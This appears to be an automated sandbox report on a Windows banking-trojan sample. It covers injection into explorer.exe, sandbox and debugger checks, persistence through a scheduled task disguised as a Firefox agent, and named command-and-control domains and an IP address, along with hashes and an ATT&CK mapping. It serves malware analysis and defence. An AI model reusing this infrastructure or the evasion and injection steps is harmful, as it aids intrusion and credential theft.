Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE15BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,10_2_00CE15BE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1939 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,wsprintfW,wsprintfW,RtlZeroMemory,lstrcat,StrToIntA,PathMatchSpecW,FindNextFileW,FindClose,14_2_003A1939
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1936 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,FindNextFileW,FindClose,14_2_003A1936
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A217C FindFirstFileW,FindNextFileW,FindClose,14_2_003A217C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1FFD FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,14_2_003A1FFD
Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 600000 (2 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1B5B GetTempPathW,lstrcatW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,wsprintfW,CreateFileW,GetFileSize,ReadFile,CloseHandle,DeleteFileW,14_2_003A1B5B
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\explorer.exe | API call chain: ExitProcess graph end node (graph_14-8057)
Source: C:\Windows\SysWOW64\explorer.exe | API call chain: ExitProcess graph end node
Source: explorer.exe, 00000001.00000000.323049259.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000000.294853901.000000000057A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.323241922.0000000007B66000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000001.00000003.301318590.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.262570544.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000003.301318590.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000001.00000000.344656957.0000000005F12000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\jdggfai | System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A9064 _memset,IsDebuggerPresent,14_2_003A9064
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,10_2_00CE16C7
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003AE09A RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,14_2_003AE09A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE1FA1 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,10_2_00CE1FA1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE1000 GetProcessHeap,RtlAllocateHeap,10_2_00CE1000
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\jdggfai | Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE1FA1 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,10_2_00CE1FA1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A8D3B SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_003A8D3B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | File created: jdggfai.1.dr
Source: C:\Windows\explorer.exe | Domain query: r3oidsofsios.com
Source: C:\Users\user\Desktop\file.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\file.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\jdggfai | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\jdggfai | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: E2F380 (6 occurrences)
Source: C:\Windows\explorer.exe | Memory written: PID: 1372 base: E2F380 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 4452 base: 7FF75EDE8150 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 1836 base: E2F380 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 4584 base: 7FF75EDE8150 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 3852 base: E2F380 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 2088 base: E2F380 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 4800 base: E2F380 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 1776 base: 7FF75EDE8150 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 2464 base: E2F380 value: 90
Source: C:\Users\user\Desktop\file.exe | Thread created: C:\Windows\explorer.exe EIP: 2661A08
Source: C:\Users\user\AppData\Roaming\jdggfai | Thread created: unknown EIP: 46B1A08
Source: C:\Windows\SysWOW64\explorer.exe | Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe 16_2_007D10A5
Source: C:\Windows\SysWOW64\explorer.exe | Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe 16_2_007D1016
Source: explorer.exe, 00000001.00000000.337344155.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.257164062.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.295196336.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000001.00000000.323317074.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.301218048.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.344513618.00000000056F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.293996667.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.337344155.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.256788442.00000000004C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.337344155.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.257164062.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.295196336.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003AE7AC cpuid 14_2_003AE7AC
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A8878 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_003A8878
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 15_2_031D2297 RtlGetVersion,wsprintfA,15_2_031D2297

Stealing of Sensitive Information

Source: Yara match | File source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4584, type: MEMORYSTR
Source: Yara match | File source: 9.2.jdggfai.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.3.jdggfai.6f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.jdggfai.6d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4584, type: MEMORYSTR
Source: Yara match | File source: 9.2.jdggfai.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.3.jdggfai.6f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.jdggfai.6d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the signature count shown for that technique)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (12); Exploitation for Client Execution (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Create Account (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: DLL Side-Loading (1); Process Injection (513); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (131); Process Injection (513); Hidden Files and Directories (1)
Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (15); Security Software Discovery (351); Virtualization/Sandbox Evasion (131); Process Discovery (13); Application Window Discovery (1); Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Input Capture (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (2); Non-Application Layer Protocol (3); Application Layer Protocol (113); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Behavior Graph (ID: 756298, Sample: file.exe, Startdate: 30/11/2022, Architecture: WINDOWS, Score: 100)

Start node signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 3 other signatures
Started from start node: file.exe; jdggfai

file.exe signatures: Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process
file.exe injected: explorer.exe

jdggfai signatures: Machine Learning detection for dropped file; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)

explorer.exe (injected) DNS/IP: r3oidsofsios.com 185.246.221.151, ports 49715, 49716, 49717, LVLT-10753US, Germany
explorer.exe (injected) dropped: C:\Users\user\AppData\Roaming\jdggfai (PE32); C:\Users\user\...\jdggfai:Zone.Identifier (ASCII)
explorer.exe (injected) signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); 3 other signatures
explorer.exe (injected) started: explorer.exe; explorer.exe; explorer.exe; 6 other processes

explorer.exe (child) signatures: Found evasive API chain (may stop execution after checking mutex); Checks if browser processes are running; Contains functionality to compare user and computer (likely to detect sandboxes)

                SourceDetectionScannerLabelLink
                file.exe34%VirustotalBrowse
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\jdggfai100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                0.2.file.exe.5d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.3.jdggfai.6f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.jdggfai.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.3.file.exe.5e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.jdggfai.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                SourceDetectionScannerLabelLink
                r3oidsofsios.com3%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://xdd42sdfsdf.com/1%VirustotalBrowse
                http://s2scomm20.com/1%VirustotalBrowse
                http://c2csosi228d.com/1%VirustotalBrowse
                http://xdd42sdfsdf.com/0%Avira URL Cloudsafe
                http://s2scomm20.com/0%Avira URL Cloudsafe
                http://c2csosi228d.com/100%Avira URL Cloudmalware
                http://r3oidsofsios.com/Mozilla/5.00%Avira URL Cloudsafe
                http://r3oidsofsios.com/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                r3oidsofsios.com
                185.246.221.151
                truetrueunknown
Name | Malicious | Antivirus Detection | Reputation
http://s2scomm20.com/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://c2csosi228d.com/ | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://xdd42sdfsdf.com/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://r3oidsofsios.com/ | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://go.mail.ru/search | explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://search.yahoo.com/search | explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://www.google.com/search | explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://nova.rambler.ru/search | explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://r3oidsofsios.com/Mozilla/5.0 | explorer.exe, 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.408629568.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.508519891.0000000001039000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.509151416.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.414672467.0000000000F50000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.508405258.0000000001268000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.509492375.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.508629995.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.425875513.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://search.aol.com/aol/search | explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.246.221.151 | r3oidsofsios.com | Germany | | 10753 | LVLT-10753US | true
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:756298
                          Start date and time:2022-11-30 00:10:30 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 8m 1s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:file.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.bank.troj.evad.winEXE@20/3@29/1
                          EGA Information:
                          • Successful, ratio: 90.9%
                          HDC Information:
                          • Successful, ratio: 40.1% (good quality ratio 29.4%)
                          • Quality average: 41%
                          • Quality standard deviation: 31.6%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 64
                          • Number of non-executed functions: 87
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                          • Execution Graph export aborted for target jdggfai, PID 5952 because it is empty
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description
00:12:31 | Task Scheduler | Run new task: Firefox Default Browser Agent 3F6E2A49B5A2019A path: C:\Users\user\AppData\Roaming\jdggfai
00:12:48 | API Interceptor | 329x Sleep call for process: explorer.exe modified
                          Process:C:\Windows\explorer.exe
                          File Type:data
                          Category:modified
                          Size (bytes):160970
                          Entropy (8bit):7.998679399911187
                          Encrypted:true
                          SSDEEP:3072:Ot6MQNn3XKprOPX+1zMkg7BWTHnMs18vGyMYzZQunMwvY:nN3XMrOv+1zMkg7BWTH1uNZQunbY
                          MD5:3BCD6D6CA7F3787FB48CE0A6ACB9AC0F
                          SHA1:99CC47E2A3229CC1F727AF36607932B562B8EC50
                          SHA-256:39AB690FF5A0633B24065AF986D1DAE4995B57F056776B8BB638833A62FF5B06
                          SHA-512:3CC89A6D55BF632283B2245B288500EFAA9FC75881AC005628971D0C691AA38A2D37F9F343EDC047794A3FD8EA843BF64E1F9302616DBD918BF2D79AF9D44AAD
                          Malicious:false
                          Process:C:\Windows\explorer.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):148992
                          Entropy (8bit):7.085071601621051
                          Encrypted:false
                          SSDEEP:3072:MDxDtsHGGH2wUp5zjLf0+p+4vrtWhqyXV5G0pbCA:atuH2/jLfM4vr0quk0p/
                          MD5:F39DBBCDCAAC9C8D2039B855C752C214
                          SHA1:AB36DA0A55FEAB685587C52BCE5268FCA7EF0E23
                          SHA-256:12675D0F7C4A8D729EDA453AD01697B0790F2921258E9BEFC54CF9327156AA10
                          SHA-512:44419723FFBDF3CAF47FC0902AFD36BCCFE66AD60C150333FDA1EA62DA6410FBEBB805CCF61278CD95FD48F7BA23EDD06857050AB24D069AB6F3D2A8D1854BB0
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Process:C:\Windows\explorer.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.085071601621051
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:148992
                          MD5:f39dbbcdcaac9c8d2039b855c752c214
                          SHA1:ab36da0a55feab685587c52bce5268fca7ef0e23
                          SHA256:12675d0f7c4a8d729eda453ad01697b0790f2921258e9befc54cf9327156aa10
                          SHA512:44419723ffbdf3caf47fc0902afd36bccfe66ad60c150333fda1ea62da6410fbebb805ccf61278cd95fd48f7ba23edd06857050ab24d069ab6f3d2a8d1854bb0
                          SSDEEP:3072:MDxDtsHGGH2wUp5zjLf0+p+4vrtWhqyXV5G0pbCA:atuH2/jLfM4vr0quk0p/
                          TLSH:40E3DF157291D033E79794315925C3A26BFAF93228B4C94BB7480B7E4FB12D1BA2B307
                          Icon Hash:d4b4b0e8e0eaf0c0
                          Entrypoint:0x404c97
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x6183E2E1 [Thu Nov 4 13:40:49 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:2ac0f7085258eff31142b9f87cb0f218
                          Instruction
                          call 00007FF368B207BCh
                          jmp 00007FF368B1A99Dh
                          sub eax, 000003A4h
                          je 00007FF368B1AB44h
                          sub eax, 04h
                          je 00007FF368B1AB39h
                          sub eax, 0Dh
                          je 00007FF368B1AB2Eh
                          dec eax
                          je 00007FF368B1AB25h
                          xor eax, eax
                          ret
                          mov eax, 00000404h
                          ret
                          mov eax, 00000412h
                          ret
                          mov eax, 00000804h
                          ret
                          mov eax, 00000411h
                          ret
                          mov edi, edi
                          push esi
                          push edi
                          mov esi, eax
                          push 00000101h
                          xor edi, edi
                          lea eax, dword ptr [esi+1Ch]
                          push edi
                          push eax
                          call 00007FF368B1BD2Eh
                          xor eax, eax
                          movzx ecx, ax
                          mov eax, ecx
                          mov dword ptr [esi+04h], edi
                          mov dword ptr [esi+08h], edi
                          mov dword ptr [esi+0Ch], edi
                          shl ecx, 10h
                          or eax, ecx
                          lea edi, dword ptr [esi+10h]
                          stosd
                          stosd
                          stosd
                          mov ecx, 00421658h
                          add esp, 0Ch
                          lea eax, dword ptr [esi+1Ch]
                          sub ecx, esi
                          mov edi, 00000101h
                          mov dl, byte ptr [ecx+eax]
                          mov byte ptr [eax], dl
                          inc eax
                          dec edi
                          jne 00007FF368B1AB19h
                          lea eax, dword ptr [esi+0000011Dh]
                          mov esi, 00000100h
                          mov dl, byte ptr [eax+ecx]
                          mov byte ptr [eax], dl
                          inc eax
                          dec esi
                          jne 00007FF368B1AB19h
                          pop edi
                          pop esi
                          ret
                          mov edi, edi
                          push ebp
                          mov ebp, esp
                          sub esp, 0000051Ch
                          mov eax, dword ptr [00422260h]
